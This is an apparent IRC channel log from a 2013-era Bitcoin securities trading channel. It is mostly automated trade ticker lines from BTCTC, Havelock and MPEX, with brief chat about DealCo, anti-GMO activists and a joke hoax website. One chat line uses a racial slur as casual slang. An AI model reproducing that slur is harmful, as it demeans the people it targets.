[BTC-GROWTH] 33 @ 0.1024 = 3.3792 BTC [+] Sep 04 00:42:38 [MPEX] [S.MPOE] 9800 @ 0.00086994 = 8.5254 BTC [+] Sep 04 00:45:45 [BTCTC] [BASIC-MINING] 1 @ 0.1326 BTC [-] Sep 04 00:47:33 [BTCTC] [BASIC-MINING] 1 @ 0.1326 BTC [-] Sep 04 00:49:13 [BTCTC] [BASIC-MINING] 25 @ 0.1359 = 3.3975 BTC [+] Sep 04 00:49:15 [BTCTC] [BASIC-MINING] 31 @ 0.136 = 4.216 BTC [+] Sep 04 00:49:20 [HAVELOCK] [SMG] 77 @ 0.00020999 = 0.0162 BTC [+] Sep 04 00:52:53 [HAVELOCK] [CFIG] 4 @ 0.1225 = 0.49 BTC [+] Sep 04 00:53:01 [BTCTC] [DMS.SELLING] 4 @ 0.01324 = 0.053 BTC [-] Sep 04 00:53:40 [BTCTC] [LABCOIN] 5 @ 0.003721 = 0.0186 BTC [+] Sep 04 00:53:41 [BTCTC] [LABCOIN] 11 @ 0.003722 = 0.0409 BTC [+] Sep 04 00:53:42 [BTCTC] [LABCOIN] 19 @ 0.003723 = 0.0707 BTC [+] Sep 04 00:53:52 [BTCTC] [BASIC-MINING] 2 @ 0.1378 = 0.2756 BTC [+] Sep 04 00:53:54 [BTCTC] [BASIC-MINING] 10 @ 0.1399 = 1.399 BTC [+] Sep 04 00:53:55 [BTCTC] [BASIC-MINING] 5 @ 0.14 = 0.7 BTC [+] Sep 04 00:53:56 [BTCTC] [BASIC-MINING] 4 @ 0.14 = 0.56 BTC [+] Sep 04 00:54:00 [HAVELOCK] [DEALCO] 1 @ 0.01399999 BTC [+] Sep 04 00:54:21 [BTCTC] [DMS.SELLING] 1 @ 0.01324 BTC [-] Sep 04 00:54:40 [HAVELOCK] [CFIG] 6 @ 0.122 = 0.732 BTC [-] Sep 04 00:57:00 [HAVELOCK] [DEALCO] 24 @ 0.01399999 = 0.336 BTC [+] Sep 04 00:57:12 [HAVELOCK] [DEALCO] 25 @ 0.01399999 = 0.35 BTC [+] Sep 04 00:57:16 [HAVELOCK] [DEALCO] 21 @ 0.01399999 = 0.294 BTC [+] Sep 04 00:57:47 [HAVELOCK] [CFIG] 1 @ 0.122 BTC [-] Sep 04 00:58:04 [HAVELOCK] [CFIG] 9 @ 0.1215 = 1.0935 BTC [-] Sep 04 00:58:22 [BTCTC] [ACTIVEMINING] 1 @ 0.003925 BTC [+] Sep 04 00:58:23 [BTCTC] [ACTIVEMINING] 10 @ 0.003926 = 0.0393 BTC [+] Sep 04 00:58:25 [BTCTC] [ACTIVEMINING] 2 @ 0.003946 = 0.0079 BTC [+] Sep 04 00:59:04 [BTCTC] [LABCOIN] 20 @ 0.003723 = 0.0745 BTC [+] Sep 04 01:00:24 [BTCTC] [LABCOIN] 191 @ 0.003723 = 0.7111 BTC [+] Sep 04 01:00:25 [BTCTC] [LABCOIN] 766 @ 0.003725 = 2.8534 BTC [+] Sep 04 01:00:27 [BTCTC] [LABCOIN] 50 @ 0.00373 = 0.1865 BTC [+] Sep 04 01:00:28 [BTCTC] [LABCOIN] 150 @ 0.003738 = 0.5607 BTC [+] Sep 04 01:00:28 [BTCTC] [LABCOIN] 150 @ 0.003747 = 0.5621 BTC [+] Sep 04 01:00:29 [BTCTC] [LABCOIN] 1490 @ 0.003748 = 5.5845 BTC [+] Sep 04 01:00:30 [BTCTC] [LABCOIN] 1272 @ 0.003749 = 4.7687 BTC [+] Sep 04 01:00:31 [BTCTC] [LABCOIN] 1500 @ 0.003749 = 5.6235 BTC [+] Sep 04 01:00:32 [BTCTC] [LABCOIN] 4215 @ 0.00375 = 15.8063 BTC [+] Sep 04 01:00:33 [BTCTC] [LABCOIN] 100 @ 0.00375 = 0.375 BTC [+] Sep 04 01:00:51 [HAVELOCK] [AM1] 1 @ 2.434 BTC [+] Sep 04 01:01:20 [BTCTC] [DMS.MINING] 8 @ 0.002868 = 0.0229 BTC [+] Sep 04 01:01:34 [HAVELOCK] [DEALCO] 24 @ 0.01399999 = 0.336 BTC [+] Sep 04 01:02:09 [BTCTC] [DMS.MINING] 1 @ 0.002868 BTC [+] Sep 04 01:02:34 [BTCTC] [DMS.MINING] 8 @ 0.002878 = 0.023 BTC [+] Sep 04 01:03:46 [BTCTC] [DMS.SELLING] 2 @ 0.01324 = 0.0265 BTC [-] Sep 04 01:04:51 [HAVELOCK] [DEALCO] 10 @ 0.01399999 = 0.14 BTC [+] Sep 04 01:10:41 [HAVELOCK] [DEALCO] 20 @ 0.01399999 = 0.28 BTC [+] Sep 04 01:11:30 [HAVELOCK] [DEALCO] 25 @ 0.014 = 0.35 BTC [+] Sep 04 01:11:33 [HAVELOCK] [DEALCO] 1 @ 0.014 BTC [+] Sep 04 01:13:15 [HAVELOCK] [DEALCO] 50 @ 0.01439999 = 0.72 BTC [+] Sep 04 01:15:39 [HAVELOCK] [DEALCO] 5 @ 0.014 = 0.07 BTC [-] Sep 04 01:16:35 [HAVELOCK] [DEALCO] 1 @ 0.01439999 BTC [+] Sep 04 01:17:13 [HAVELOCK] [DEALCO] 1 @ 0.01439999 BTC [+] Sep 04 01:17:32 [BTCTC] [DMS.MINING] 200 @ 0.002868 = 0.5736 BTC [-] Sep 04 01:17:38 [HAVELOCK] [DEALCO] 1 @ 0.01439999 BTC [+] Sep 04 01:17:57 [HAVELOCK] [DEALCO] 7 @ 0.01439999 = 0.1008 BTC [+] Sep 04 01:18:25 [BTCTC] [DMS.MINING] 35 @ 0.002878 = 0.1007 BTC [+] Sep 04 01:19:00 [HAVELOCK] [DEALCO] 10 @ 0.01439999 = 0.144 BTC [+] Sep 04 01:19:48 [HAVELOCK] [DEALCO] 15 @ 0.01439999 = 0.216 BTC [+] Sep 04 01:20:15 [BTCTC] [LABCOIN] 40 @ 0.003753 = 0.1501 BTC [+] Sep 04 01:20:50 [HAVELOCK] [DEALCO] 5 @ 0.01439999 = 0.072 BTC [+] Sep 04 01:21:09 [HAVELOCK] [DEALCO] 10 @ 0.01439999 = 0.144 BTC [+] Sep 04 01:21:45 [MPEX] [S.MPOE] 11300 @ 0.00086845 = 9.8135 BTC [-] Sep 04 01:23:06 [HAVELOCK] [DEALCO] 22 @ 0.01439999 = 0.3168 BTC [+] Sep 04 01:23:13 [BTCTC] [DMS.MINING] 35 @ 0.002868 = 0.1004 BTC [-] Sep 04 01:27:14 [HAVELOCK] [DEALCO] 1 @ 0.01439999 BTC [+] Sep 04 01:28:25 [HAVELOCK] [DEALCO] 10 @ 0.01439999 = 0.144 BTC [+] Sep 04 01:28:48 [HAVELOCK] [DEALCO] 10 @ 0.01439999 = 0.144 BTC [+] Sep 04 01:29:04 dude shoulda IPO'd at .015 Sep 04 01:30:08 waht is dealco Sep 04 01:30:23 [BTCTC] [BFMINES] 11 @ 0.003501 = 0.0385 BTC [+] Sep 04 01:30:36 localbitcoins kinda thing Sep 04 01:31:02 http://www.dealco.in/ Sep 04 01:31:40 [BTCTC] [ACTIVEMINING] 257 @ 0.003946 = 1.0141 BTC [+] Sep 04 01:31:41 [BTCTC] [ACTIVEMINING] 10 @ 0.003948 = 0.0395 BTC [+] Sep 04 01:31:42 [BTCTC] [ACTIVEMINING] 29 @ 0.003949 = 0.1145 BTC [+] Sep 04 01:31:43 [BTCTC] [ACTIVEMINING] 1804 @ 0.003998 = 7.2124 BTC [+] Sep 04 01:32:34 [BTCTC] [ACTIVEMINING] 224 @ 0.003995 = 0.8949 BTC [-] Sep 04 01:32:35 [BTCTC] [ACTIVEMINING] 301 @ 0.003998 = 1.2034 BTC [+] Sep 04 01:34:33 [HAVELOCK] [AM1] 1 @ 2.36 BTC [-] Sep 04 01:34:38 [BTCTC] [BTC-BOND] 200 @ 0.00992 = 1.984 BTC [-] Sep 04 01:35:43 [HAVELOCK] [AM100] 1 @ 0.0234 BTC [-] Sep 04 01:35:45 [HAVELOCK] [AM100] 3 @ 0.0235 = 0.0705 BTC [+] Sep 04 01:36:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.02359 BTC [+] Sep 04 01:37:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.0236 BTC [+] Sep 04 01:37:49 [MPEX] [S.MPOE] 9277 @ 0.00086598 = 8.0337 BTC [-] Sep 04 01:37:53 [BTCTC] [TAT.ASICMINER] 8 @ 0.02379 = 0.1903 BTC [+] Sep 04 01:38:53 [BTCTC] [PETA-MINE] 112 @ 0.65 = 72.8 BTC [+] Sep 04 01:43:51 [BTCTC] [DMS.MINING] 21 @ 0.00287 = 0.0603 BTC [+] Sep 04 01:43:52 [BTCTC] [DMS.MINING] 79 @ 0.002868 = 0.2266 BTC [-] Sep 04 01:44:28 http://www.slate.com/blogs/future_tense/2013/08/26/golden_rice_attack_in_philippines_anti_gmo_activists_lie_about_protest_and.html Sep 04 01:44:29 Golden rice attack in Philippines: Anti-GMO activists lie about protest and safety. Sep 04 01:44:34 i like these activists Sep 04 01:44:44 [HAVELOCK] [XBOND] 5 @ 0.0011 = 0.0055 BTC [-] Sep 04 01:44:47 they want to kill poor people by denying them GMO vitamin a in easily grown crops Sep 04 01:44:50 ++hippies Sep 04 01:45:15 in France they destroyed experimental crops that were designed to cure a children illness Sep 04 01:45:51 "golden rice"? pankkake Sep 04 01:45:53 [BTCTC] [ACTIVEMINING] 10 @ 0.003968 = 0.0397 BTC [-] Sep 04 01:46:01 it was years ago Sep 04 01:46:24 [BTCTC] [BASIC-MINING] 10 @ 0.1489 = 1.489 BTC [+] Sep 04 01:46:25 [BTCTC] [BASIC-MINING] 6 @ 0.149 = 0.894 BTC [+] Sep 04 01:47:07 [BTCTC] [ACTIVEMINING] 31 @ 0.003991 = 0.1237 BTC [+] Sep 04 01:47:16 led by http://www.biosegura.es/wp-content/uploads/2013/03/JOSE-BOVE2.jpg Sep 04 01:48:10 I think it was corn Sep 04 01:48:41 "I could see that this was the first time they had stepped in mud or been to a farm." unsurprising Sep 04 01:48:49 activists Sep 04 01:48:51 thought leaders Sep 04 01:49:18 downright bold, that ripping rice out of the ground Sep 04 01:51:21 [BTCTC] [BASIC-MINING] 2 @ 0.1548 = 0.3096 BTC [+] Sep 04 01:52:41 [HAVELOCK] [DEALCO] 57 @ 0.01439999 = 0.8208 BTC [+] Sep 04 01:53:05 [HAVELOCK] [DEALCO] 75 @ 0.0144 = 1.08 BTC [+] Sep 04 01:54:23 [BTCTC] [BASIC-MINING] 17 @ 0.1548 = 2.6316 BTC [+] Sep 04 01:54:26 [HAVELOCK] [DEALCO] 17 @ 0.01449898 = 0.2465 BTC [+] Sep 04 01:54:28 [HAVELOCK] [DEALCO] 30 @ 0.01449899 = 0.435 BTC [+] Sep 04 01:54:30 [HAVELOCK] [DEALCO] 15 @ 0.01499996 = 0.225 BTC [+] Sep 04 01:54:32 [HAVELOCK] [DEALCO] 38 @ 0.01499997 = 0.57 BTC [+] Sep 04 01:57:52 [BTCTC] [BASIC-MINING] 6 @ 0.1548 = 0.9288 BTC [+] Sep 04 01:57:53 [BTCTC] [BASIC-MINING] 5 @ 0.1549 = 0.7745 BTC [+] Sep 04 01:57:54 [BTCTC] [BASIC-MINING] 1 @ 0.1549 BTC [+] Sep 04 01:57:55 [BTCTC] [BASIC-MINING] 3 @ 0.155 = 0.465 BTC [+] Sep 04 01:57:57 [BTCTC] [BASIC-MINING] 1 @ 0.155 BTC [+] Sep 04 01:59:15 well, hoaxes and propaganda... Sep 04 01:59:24 http://zapatopi.net/treeoctopus/ i have totally fell for this for few years Sep 04 01:59:26 Save The Pacific Northwest Tree Octopus Sep 04 01:59:50 at least this one is harmless joke Sep 04 02:00:07 lol cascadia Sep 04 02:00:22 [BTCTC] [ACTIVEMINING] 20 @ 0.003984 = 0.0797 BTC [-] Sep 04 02:00:30 wow, they've put a lot of effort into it :) Sep 04 02:00:33 [HAVELOCK] [AM1] 1 @ 2.4339 BTC [+] Sep 04 02:01:00 gmo is the work of the devil. Sep 04 02:01:16 [BTCTC] [DMS.SELLING] 100 @ 0.0128 = 1.28 BTC [-] Sep 04 02:01:32 [BTCTC] [DMS.MINING] 10 @ 0.002883 = 0.0288 BTC [+] Sep 04 02:01:49 not at all. it's totally necessary to feed everyone. Sep 04 02:02:16 [BTCTC] [BASIC-MINING] 4 @ 0.158 = 0.632 BTC [+] Sep 04 02:02:18 [BTCTC] [BASIC-MINING] 3 @ 0.1606 = 0.4818 BTC [+] Sep 04 02:02:41 [BTCTC] [BASIC-MINING] 1 @ 0.1606 BTC [+] Sep 04 02:02:52 [BTCTC] [BASIC-MINING] 2 @ 0.1606 = 0.3212 BTC [+] Sep 04 02:03:54 [BTCTC] [BASIC-MINING] 3 @ 0.1606 = 0.4818 BTC [+] Sep 04 02:04:11 [BTCTC] [BASIC-MINING] 1 @ 0.1606 BTC [+] Sep 04 02:04:11 (jokes, jokes...) Sep 04 02:06:43 [HAVELOCK] [AM100] 1 @ 0.0235 BTC [+] Sep 04 02:10:55 [BTCTC] [BASIC-MINING] 1 @ 0.16 BTC [-] Sep 04 02:10:56 [BTCTC] [BASIC-MINING] 4 @ 0.1607 = 0.6428 BTC [+] Sep 04 02:10:57 [BTCTC] [BASIC-MINING] 3 @ 0.161 = 0.483 BTC [+] Sep 04 02:10:58 [BTCTC] [BASIC-MINING] 1 @ 0.1622 BTC [+] Sep 04 02:10:59 [BTCTC] [BASIC-MINING] 3 @ 0.167 = 0.501 BTC [+] Sep 04 02:11:00 [BTCTC] [BASIC-MINING] 25 @ 0.1676 = 4.19 BTC [+] Sep 04 02:11:01 [BTCTC] [BASIC-MINING] 10 @ 0.1677 = 1.677 BTC [+] Sep 04 02:11:02 [BTCTC] [BASIC-MINING] 4 @ 0.1698 = 0.6792 BTC [+] Sep 04 02:11:03 [BTCTC] [BASIC-MINING] 5 @ 0.175 = 0.875 BTC [+] Sep 04 02:11:04 [BTCTC] [BASIC-MINING] 4 @ 0.175 = 0.7 BTC [+] Sep 04 02:11:05 [BTCTC] [BASIC-MINING] 25 @ 0.1776 = 4.44 BTC [+] Sep 04 02:11:06 [BTCTC] [BASIC-MINING] 10 @ 0.1777 = 1.777 BTC [+] Sep 04 02:11:06 [BTCTC] [BASIC-MINING] 5 @ 0.1779 = 0.8895 BTC [+] Sep 04 02:11:07 [BTCTC] [BASIC-MINING] 10 @ 0.1794 = 1.794 BTC [+] Sep 04 02:11:08 [BTCTC] [BASIC-MINING] 5 @ 0.1795 = 0.8975 BTC [+] Sep 04 02:11:09 [BTCTC] [BASIC-MINING] 10 @ 0.1796 = 1.796 BTC [+] Sep 04 02:11:10 [BTCTC] [BASIC-MINING] 3 @ 0.1797 = 0.5391 BTC [+] Sep 04 02:11:11 [BTCTC] [BASIC-MINING] 5 @ 0.181 = 0.905 BTC [+] Sep 04 02:11:12 [BTCTC] [BASIC-MINING] 5 @ 0.187 = 0.935 BTC [+] Sep 04 02:11:13 [BTCTC] [BASIC-MINING] 2 @ 0.1898 = 0.3796 BTC [+] Sep 04 02:13:06 [BTCTC] [ACTIVEMINING] 10 @ 0.003822 = 0.0382 BTC [-] Sep 04 02:15:18 [BTCTC] [ACTIVEMINING] 290 @ 0.003698 = 1.0724 BTC [-] Sep 04 02:20:53 [HAVELOCK] [DEALCO] 5 @ 0.01499999 = 0.075 BTC [+] Sep 04 02:23:24 [HAVELOCK] [SDSTM] 25 @ 0.0032 = 0.08 BTC [-] Sep 04 02:23:27 [HAVELOCK] [SDSTM] 5 @ 0.00311 = 0.0156 BTC [-] Sep 04 02:23:28 [HAVELOCK] [SDSTM] 50 @ 0.00310003 = 0.155 BTC [-] Sep 04 02:23:31 [HAVELOCK] [SDSTM] 110 @ 0.00310002 = 0.341 BTC [-] Sep 04 02:23:33 [HAVELOCK] [SDSTM] 6 @ 0.00310001 = 0.0186 BTC [-] Sep 04 02:23:35 [HAVELOCK] [SDSTM] 50 @ 0.00310001 = 0.155 BTC [-] Sep 04 02:23:37 [HAVELOCK] [SDSTM] 8 @ 0.0031 = 0.0248 BTC [-] Sep 04 02:23:39 [HAVELOCK] [SDSTM] 57 @ 0.003 = 0.171 BTC [-] Sep 04 02:23:41 [HAVELOCK] [SDSTM] 5 @ 0.00251 = 0.0126 BTC [-] Sep 04 02:23:43 [HAVELOCK] [SDSTM] 84 @ 0.00250011 = 0.21 BTC [-] Sep 04 02:23:46 [BTCTC] [BASIC-MINING] 1 @ 0.1899 BTC [+] Sep 04 02:24:03 [HAVELOCK] [SDSTM] 66 @ 0.00250011 = 0.165 BTC [-] Sep 04 02:26:58 [HAVELOCK] [SDSTM] 33 @ 0.00250011 = 0.0825 BTC [-] Sep 04 02:30:45 [BTCTC] [ASICMINER-PT] 2 @ 2.498 = 4.996 BTC [+] Sep 04 02:31:44 [BTCTC] [BASIC-MINING] 2 @ 0.189 = 0.378 BTC [-] Sep 04 02:31:45 [BTCTC] [BASIC-MINING] 25 @ 0.1897 = 4.7425 BTC [+] Sep 04 02:32:12 [BTCTC] [BASIC-MINING] 1 @ 0.1897 BTC [+] Sep 04 02:32:13 [BTCTC] [BASIC-MINING] 6 @ 0.1651 = 0.9906 BTC [-] Sep 04 02:32:15 [BTCTC] [BASIC-MINING] 25 @ 0.165 = 4.125 BTC [-] Sep 04 02:32:29 [BTCTC] [TAT.ASICMINER] 16 @ 0.02339 = 0.3742 BTC [-] Sep 04 02:32:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.02338 = 0.2338 BTC [-] Sep 04 02:32:32 [BTCTC] [TAT.ASICMINER] 15 @ 0.02323 = 0.3485 BTC [-] Sep 04 02:32:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.02322 = 0.2322 BTC [-] Sep 04 02:32:34 [BTCTC] [TAT.ASICMINER] 51 @ 0.02321 = 1.1837 BTC [-] Sep 04 02:32:36 [BTCTC] [TAT.ASICMINER] 90 @ 0.0232 = 2.088 BTC [-] Sep 04 02:34:59 [MPEX] [S.MPOE] 1520 @ 0.00086985 = 1.3222 BTC [+] Sep 04 02:40:14 [BTCTC] [BFMINES] 1 @ 0.001644 BTC [-] Sep 04 02:40:42 [BTCTC] [BITVPS] 30 @ 0.0024 = 0.072 BTC [-] Sep 04 02:40:45 [BTCTC] [BITVPS] 10 @ 0.002275 = 0.0228 BTC [-] Sep 04 02:40:46 [BTCTC] [BITVPS] 75 @ 0.002274 = 0.1706 BTC [-] Sep 04 02:57:01 [MPEX] [S.MPOE] 6100 @ 0.00086985 = 5.3061 BTC [+] Sep 04 02:57:31 [BTCTC] [PETA-MINE] 1 @ 0.6598 BTC [+] Sep 04 03:00:27 [BTCTC] [PETA-MINE] 5 @ 0.6599 = 3.2995 BTC [+] Sep 04 03:02:52 [BTCTC] [BASIC-MINING] 5 @ 0.1898 = 0.949 BTC [+] Sep 04 03:02:55 [HAVELOCK] [DEALCO] 20 @ 0.013 = 0.26 BTC [-] Sep 04 03:14:27 [BTCTC] [DMS.PURCHASE] 1 @ 0.01578 BTC [+] Sep 04 03:21:43 [BTCTC] [ACTIVEMINING] 2 @ 0.003741 = 0.0075 BTC [+] Sep 04 03:22:46 [BTCTC] [ACTIVEMINING] 198 @ 0.003692 = 0.731 BTC [-] Sep 04 03:23:41 [BTCTC] [NASTY-PT] 223 @ 0.002094 = 0.467 BTC [-] Sep 04 03:23:42 [BTCTC] [NASTY-PT] 100 @ 0.002093 = 0.2093 BTC [-] Sep 04 03:23:42 [BTCTC] [NASTY-PT] 225 @ 0.002023 = 0.4552 BTC [-] Sep 04 03:23:45 [BTCTC] [NASTY-PT] 2 @ 0.002021 = 0.004 BTC [-] Sep 04 03:23:45 [BTCTC] [NASTY-PT] 400 @ 0.001901 = 0.7604 BTC [-] Sep 04 03:23:46 [BTCTC] [NASTY-PT] 2 @ 0.0019 = 0.0038 BTC [-] Sep 04 03:23:47 [BTCTC] [NASTY-PT] 20 @ 0.001877 = 0.0375 BTC [-] Sep 04 03:23:48 [BTCTC] [NASTY-PT] 3 @ 0.0017 = 0.0051 BTC [-] Sep 04 03:23:49 [BTCTC] [NASTY-PT] 81 @ 0.001601 = 0.1297 BTC [-] Sep 04 03:24:29 [BTCTC] [ASICMINER-PT] 1 @ 2.498 BTC [+] Sep 04 03:25:52 [BTCTC] [DMS.SELLING] 46 @ 0.0132 = 0.6072 BTC [+] Sep 04 03:25:53 [BTCTC] [DMS.SELLING] 33 @ 0.01321 = 0.4359 BTC [+] Sep 04 03:25:54 [BTCTC] [DMS.SELLING] 21 @ 0.01322 = 0.2776 BTC [+] Sep 04 03:27:11 [BTCTC] [BITVPS] 20 @ 0.002274 = 0.0455 BTC [-] Sep 04 03:27:30 [BTCTC] [LABCOIN] 60 @ 0.003748 = 0.2249 BTC [-] Sep 04 03:27:32 [BTCTC] [LABCOIN] 96 @ 0.00375 = 0.36 BTC [+] Sep 04 03:27:33 [BTCTC] [LABCOIN] 192 @ 0.003753 = 0.7206 BTC [+] Sep 04 03:36:23 [HAVELOCK] [AM1] 1 @ 2.30000001 BTC [-] Sep 04 03:37:56 [BTCTC] [KENILWORTH] 5 @ 0.001631 = 0.0082 BTC [+] Sep 04 03:37:57 [BTCTC] [KENILWORTH] 60 @ 0.001631 = 0.0979 BTC [+] Sep 04 03:44:00 [HAVELOCK] [AM100] 10 @ 0.0222 = 0.222 BTC [-] Sep 04 03:44:02 [HAVELOCK] [AM100] 41 @ 0.02215001 = 0.9082 BTC [-] Sep 04 03:44:30 [MPEX] [S.MPOE] 10400 @ 0.00086815 = 9.0288 BTC [-] Sep 04 03:49:41 [MPEX] [S.MPOE] 330 @ 0.00086985 = 0.2871 BTC [+] Sep 04 03:49:43 [MPEX] [S.MPOE] 1430 @ 0.00086994 = 1.244 BTC [+] Sep 04 03:50:59 [BTCTC] [BFMINES] 6 @ 0.001678 = 0.0101 BTC [+] Sep 04 03:51:18 [BTCTC] [BASIC-MINING] 1 @ 0.1681 BTC [-] Sep 04 03:51:18 [BTCTC] [BASIC-MINING] 1 @ 0.168 BTC [-] Sep 04 03:52:29 [BTCTC] [LABCOIN] 3 @ 0.00374 = 0.0112 BTC [-] Sep 04 03:52:54 [BTCTC] [BASIC-MINING] 1 @ 0.1619 BTC [-] Sep 04 03:52:56 [BTCTC] [BASIC-MINING] 5 @ 0.1606 = 0.803 BTC [-] Sep 04 03:52:57 [BTCTC] [BASIC-MINING] 4 @ 0.1601 = 0.6404 BTC [-] Sep 04 03:52:58 [BTCTC] [BASIC-MINING] 50 @ 0.16 = 8 BTC [-] Sep 04 03:56:48 [BTCTC] [DMS.MINING] 4 @ 0.002885 = 0.0115 BTC [+] Sep 04 03:58:16 [BTCTC] [DMS.MINING] 25 @ 0.002885 = 0.0721 BTC [+] Sep 04 03:58:18 [BTCTC] [DMS.MINING] 185 @ 0.002886 = 0.5339 BTC [+] Sep 04 03:58:19 [BTCTC] [DMS.MINING] 10 @ 0.00289 = 0.0289 BTC [+] Sep 04 03:58:20 [BTCTC] [DMS.MINING] 35 @ 0.002894 = 0.1013 BTC [+] Sep 04 03:58:21 [BTCTC] [DMS.MINING] 145 @ 0.002894 = 0.4196 BTC [+] Sep 04 03:58:22 [BTCTC] [DMS.MINING] 330 @ 0.002896 = 0.9557 BTC [+] Sep 04 03:58:22 [BTCTC] [DMS.MINING] 500 @ 0.002899 = 1.4495 BTC [+] Sep 04 03:58:23 [BTCTC] [DMS.MINING] 1109 @ 0.0029 = 3.2161 BTC [+] Sep 04 03:59:32 [BTCTC] [LABCOIN] 5 @ 0.003674 = 0.0184 BTC [-] Sep 04 03:59:34 [BTCTC] [LABCOIN] 484 @ 0.003673 = 1.7777 BTC [-] Sep 04 03:59:35 [BTCTC] [LABCOIN] 100 @ 0.003671 = 0.3671 BTC [-] Sep 04 03:59:36 [BTCTC] [LABCOIN] 161 @ 0.003668 = 0.5905 BTC [-] Sep 04 04:03:34 [BTCTC] [TAT.ASICMINER] 6 @ 0.02359 = 0.1415 BTC [+] Sep 04 04:05:10 [HAVELOCK] [DEALCO] 1 @ 0.0149 BTC [+] Sep 04 04:17:36 [HAVELOCK] [DEALCO] 45 @ 0.01499999 = 0.675 BTC [+] Sep 04 04:17:39 [HAVELOCK] [DEALCO] 50 @ 0.01499999 = 0.75 BTC [+] Sep 04 04:19:26 [HAVELOCK] [DEALCO] 155 @ 0.01499999 = 2.325 BTC [+] Sep 04 04:23:21 [BTCTC] [LTC-ATF.B2] 96 @ 0.01043 = 1.0013 BTC [+] Sep 04 04:25:14 [BTCTC] [DMS.MINING] 926 @ 0.002868 = 2.6558 BTC [-] Sep 04 04:26:37 [BTCTC] [BASIC-MINING] 1 @ 0.179 BTC [+] Sep 04 04:32:59 [BTCTC] [ASICMINER-PT] 2 @ 2.498 = 4.996 BTC [+] Sep 04 04:33:00 [BTCTC] [ASICMINER-PT] 2 @ 2.499 = 4.998 BTC [+] Sep 04 04:33:01 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [+] Sep 04 04:33:03 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [+] Sep 04 04:33:04 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] Sep 04 04:33:05 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] Sep 04 04:33:06 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] Sep 04 04:40:29 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [+] Sep 04 04:40:34 [BTCTC] [BTC-GROWTH] 1 @ 0.1002 BTC [-] Sep 04 04:40:36 [BTCTC] [BTC-GROWTH] 9 @ 0.1001 = 0.9009 BTC [-] Sep 04 04:41:35 [BTCTC] [KENILWORTH] 85 @ 0.001631 = 0.1386 BTC [+] Sep 04 04:44:55 [MPEX] [S.MPOE] 1700 @ 0.00086818 = 1.4759 BTC [-] Sep 04 04:59:48 [BTCTC] [LABCOIN] 5 @ 0.003674 = 0.0184 BTC [+] Sep 04 05:00:05 [BTCTC] [LABCOIN] 145 @ 0.003674 = 0.5327 BTC [+] Sep 04 05:04:10 [BTCTC] [ACTIVEMINING] 10 @ 0.003748 = 0.0375 BTC [+] Sep 04 05:04:24 [BTCTC] [ACTIVEMINING] 2 @ 0.00376 = 0.0075 BTC [+] Sep 04 05:05:52 [BTCTC] [ACTIVEMINING] 2 @ 0.003759 = 0.0075 BTC [-] Sep 04 05:05:54 [BTCTC] [ACTIVEMINING] 200 @ 0.003762 = 0.7524 BTC [+] Sep 04 05:05:56 [BTCTC] [ACTIVEMINING] 200 @ 0.003762 = 0.7524 BTC [+] Sep 04 05:06:11 [BTCTC] [ACTIVEMINING] 40 @ 0.003762 = 0.1505 BTC [+] Sep 04 05:08:23 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [+] Sep 04 05:13:22 the one i like from today is "peta claims eating chicken makes your child have a pencil dick" Sep 04 05:13:26 nigga please Sep 04 05:16:22 [MPEX] [S.MPOE] 4088 @ 0.00086994 = 3.5563 BTC [+] Sep 04 05:16:24 [MPEX] [S.MPOE] 2262 @ 0.0008703 = 1.9686 BTC [+] Sep 04 05:16:56 [BTCTC] [LTC-ATF.B2] 1 @ 0.01043 BTC [+] Sep 04 05:18:13 yeah the evidence suggests otherwise Sep 04 05:22:40 [BTCTC] [DMS.PURCHASE] 39 @ 0.01578 = 0.6154 BTC [+] Sep 04 05:27:45 [BTCTC] [PETA-MINE] 2 @ 0.6599 = 1.3198 BTC [+] Sep 04 05:40:17 [BTCTC] [BASIC-MINING] 2 @ 0.1484 = 0.2968 BTC [-] Sep 04 05:40:19 [BTCTC] [BASIC-MINING] 4 @ 0.1465 = 0.586 BTC [-] Sep 04 05:41:31 [BTCTC] [TAT.VIRTUALMINE] 41 @ 0.0005705 = 0.0234 BTC [-] Sep 04 05:42:08 [BTCTC] [ACTIVEMINING] 3 @ 0.003933 = 0.0118 BTC [+] Sep 04 05:44:10 [BTCTC] [S.MPOE-PT] 2 @ 0.00085 = 0.0017 BTC [+] Sep 04 05:53:18 [BTCTC] [BASIC-MINING] 1 @ 0.1369 BTC [-] Sep 04 05:55:46 [BTCTC] [BASIC-MINING] 2 @ 0.1627 = 0.3254 BTC [+] Sep 04 05:55:46 [BTCTC] [BASIC-MINING] 2 @ 0.1628 = 0.3256 BTC [+] Sep 04 05:55:47 [BTCTC] [BASIC-MINING] 6 @ 0.1629 = 0.9774 BTC [+] Sep 04 05:57:01 [MPEX] [S.MPOE] 2614 @ 0.0008703 = 2.275 BTC [+] Sep 04 05:57:05 [MPEX] [S.MPOE] 3700 @ 0.00087107 = 3.223 BTC [+] Sep 04 05:57:05 [MPEX] [S.MPOE] 733 @ 0.00087222 = 0.6393 BTC [+] Sep 04 05:57:17 [BTCTC] [LTC-ATF.B2] 1045 @ 0.01043 = 10.8994 BTC [+] Sep 04 06:01:22 [BTCTC] [DMS.MINING] 1 @ 0.00294 BTC [+] Sep 04 06:05:18 [BTCTC] [PETA-MINE] 1 @ 0.6599 BTC [+] Sep 04 06:06:17 [BTCTC] [MININGCO.ETF] 5 @ 0.1049 = 0.5245 BTC [-] Sep 04 06:06:55 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Sep 04 06:07:30 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] Sep 04 06:09:25 [BTCTC] [BMF] 18 @ 0.0355 = 0.639 BTC [-] Sep 04 06:09:28 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] Sep 04 06:11:04 [HAVELOCK] [DEALCO] 5 @ 0.01499999 = 0.075 BTC [+] Sep 04 06:12:54 [BTCTC] [BASIC-MINING] 1 @ 0.1613 BTC [-] Sep 04 06:13:30 [BTCTC] [LABCOIN] 100 @ 0.0037 = 0.37 BTC [+] Sep 04 